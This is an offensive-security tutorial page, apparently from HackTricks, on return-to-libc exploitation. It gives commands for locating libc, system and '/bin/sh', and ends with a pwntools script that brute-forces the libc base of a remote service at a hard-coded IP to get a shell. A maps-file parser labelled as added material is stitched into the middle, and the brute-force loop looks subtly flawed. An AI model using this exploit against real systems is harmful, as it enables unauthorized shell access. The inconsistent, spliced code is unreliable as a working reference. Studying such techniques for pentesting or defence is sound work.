hacktricks/exploiting/linux-exploiting-basic-esp/ret2lib.md
2024-02-10 13:11:20 +00:00


Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you have found a vulnerable binary and you think you can exploit it using Ret2Lib, here you can find some basic steps you can follow.

If you are inside the host

You can find the address of libc

ldd /path/to/executable | grep libc.so.6 #Address (if ASLR is enabled, this changes every time)

If you want to check whether ASLR changes the address of libc, you can do the following:

for i in `seq 0 20`; do ldd /path/to/executable | grep libc; done

Getting the offset of the system function

To get the offset of the system function, analyze the libc that the target binary uses. First identify that libc by running ldd on the binary (as shown above); it lists the shared libraries the binary loads, including libc.

Then look up the system symbol inside that library with readelf (or objdump) and grep for system. The value printed is the symbol's position relative to the start of libc, i.e. its offset.

If instead you have a runtime address of system (for example from a debugger) and the libc base address (from ldd or from /proc/<PID>/maps), subtracting the base from the runtime address gives the same offset. Adding the offset to the libc base of a running process gives the address of system for that process, which is what a return-to-libc attack needs.

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system

Getting the offset of "/bin/sh"

To get the offset of "/bin/sh" for the target program, you can use a tool such as pwntools or ROPgadget. These tools let you find the offsets of specific strings in the libraries loaded into the target program.

Here is example code that uses the pwntools library to get the offset of "/bin/sh":

```python
from pwn import *

# Search the libc that the target loads (the same library used in the readelf/strings commands on this page)
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
# ELF.search yields every occurrence; for a shared library the value is the offset from the libc base
bin_sh_offset = next(libc.search(b'/bin/sh'))

print(f'Offset of "/bin/sh": {hex(bin_sh_offset)}')
```

After running this code you will get the offset of "/bin/sh" in hexadecimal.

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

/proc/<PID>/maps

If the process creates children every time you talk to it (a network server), try to read that file (you will probably need root access).

There you can find exactly where libc is loaded inside the process and where it will be loaded for every child of the process.

In this case it is loaded at 0xb75dc000 (this will be the base address of libc)
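Reading the libc base out of /proc/<PID>/maps by hand is error-prone, so here is a small parser for that format, added as an example and not part of the original HackTricks page. It works on a constructed maps sample (not a real capture) and also includes the check from the ASLR section above: whether libc lands at the same address across several observations.

```python
import re
from typing import Iterable, Optional

# Constructed sample of /proc/<PID>/maps for a 32-bit process (not a real capture).
SAMPLE_MAPS = """\
08048000-08049000 r-xp 00000000 08:01 1234       /home/user/vuln
08049000-0804a000 rw-p 00000000 08:01 1234       /home/user/vuln
b75dc000-b7781000 r-xp 00000000 08:01 5678       /lib/i386-linux-gnu/libc.so.6
b7781000-b7782000 ---p 001a5000 08:01 5678       /lib/i386-linux-gnu/libc.so.6
b7782000-b7784000 r--p 001a5000 08:01 5678       /lib/i386-linux-gnu/libc.so.6
b7784000-b7785000 rw-p 001a7000 08:01 5678       /lib/i386-linux-gnu/libc.so.6
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]
"""

# One maps line: start-end perms offset dev inode [path]
MAPS_RE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S+)\s+([0-9a-f]+)\s+\S+\s+\d+\s*(.*)$"
)


def libc_base(maps_text: str) -> Optional[int]:
    """Return the load base of libc from /proc/<PID>/maps text, or None.

    The base is the start of the libc mapping whose file offset is 0; later
    mappings of the same file (data, bss) carry non-zero file offsets.
    """
    for line in maps_text.splitlines():
        m = MAPS_RE.match(line)
        if not m:
            continue
        start, _end, _perms, offset, path = m.groups()
        if "libc.so" in path.rsplit("/", 1)[-1] and int(offset, 16) == 0:
            return int(start, 16)
    return None


def aslr_active(bases: Iterable[int]) -> bool:
    """True if libc was observed at more than one base across samples."""
    return len(set(bases)) > 1


if __name__ == "__main__":
    base = libc_base(SAMPLE_MAPS)
    print(f"libc base: {hex(base) if base is not None else 'not found'}")
```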

Using gdb-peda

Get the address of the system function, the exit function and the "/bin/sh" string using gdb-peda:

p system
p exit
find "/bin/sh"

Bypassing ASLR

You can try to brute force the base address of libc.

for off in range(0xb7000000, 0xb8000000, 0x1000):

Code

```python
from pwn import *

c = remote('192.168.85.181',20002)
c.recvline()    #Banner

for off in range(0xb7000000, 0xb8000000, 0x1000):
    p = b""
    p += p32(off + 0x0003cb20) #system
    p += b"CCCC" #GARBAGE (return address after system)
    p += p32(off + 0x001388da) #/bin/sh
    payload = b'A'*0x20010 + p
    c.send(payload)
    c.interactive() #?
```